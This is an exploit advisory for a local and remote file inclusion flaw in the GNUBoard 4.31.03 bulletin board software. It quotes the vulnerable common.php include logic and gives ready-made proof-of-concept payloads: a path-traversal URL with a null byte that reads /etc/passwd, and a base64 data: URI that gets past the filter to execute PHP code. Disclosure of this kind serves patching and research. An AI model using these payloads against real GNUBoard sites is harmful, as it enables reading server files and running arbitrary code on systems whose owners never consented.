GNUBoard 4.31.03 Local File Inclusion

`GNUBoard V4.31.03 (08.12.29) Local/Remote File Include Vulnerability  
BY flyh4t#hotmail.com  
Thx to qiuren/rayt  
TEAM:Wolves Security Team  
SITE:http://bbs.wolvez.org/  
  
/*************************  
  
SIR GNUBoard (VERSION 4.31.03 (08.12.29))is a widely used bulletin board system of Korea.  
It is freely available for all platforms that supports PHP and MySQL.  
But we find a file include vulnerability affects SIR GNUBoard.  
In special conditions,it may be used as a remote file include vulnerability .  
This issue to execute arbitrary PHP code on an affected computer with the privileges of the affected Web server.  
Here is the details:  
  
**************************/  
TEST ON VERSION 4.31.03 (08.12.29)  
  
/***************************  
/common.php  
  
@extract($_GET);  
@extract($_POST);  
@extract($_SERVER);  
  
……  
  
if (!$g4_path || preg_match("/:\/\//", $g4_path))  
die("<meta http-equiv='content-type' content='text/html; '><script language='JavaScript'> alert('wrong.'); </script>");  
  
//if (!$g4_path) $g4_path = ".";  
//it's not allow char :// in $g4_path  
$g4['path'] = $g4_path;  
  
unset($g4_path);  
  
include_once("$g4[path]/lib/constant.php"); //file include  
include_once("$g4[path]/config.php");   
include_once("$g4[path]/lib/common.lib.php");  
  
*************************/  
  
poc:  
http://test.com/GnuBoard/common.php?g4_path=../../../../../../etc/passwd%00  
  
when the site meets PHP >= 5.2.0&allow_url_include = On, we can use php data bypass preg_match("/:\/\//", $g4_path)  
it's became a Remote File Include Vulnerability  
  
poc:  
/*************************  
  
bypass_local.php  
<?php  
//coded by qiuren  
if (!$g4_path || preg_match("/:\/\//", $g4_path))  
die("fuck");  
$g4['path'] = $g4_path;  
unset($g4_path);  
include_once("$g4[path]/lib/constant.php");  
?>  
  
bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo=  
  
phpinfo() can be executed  
***************************/  
  
`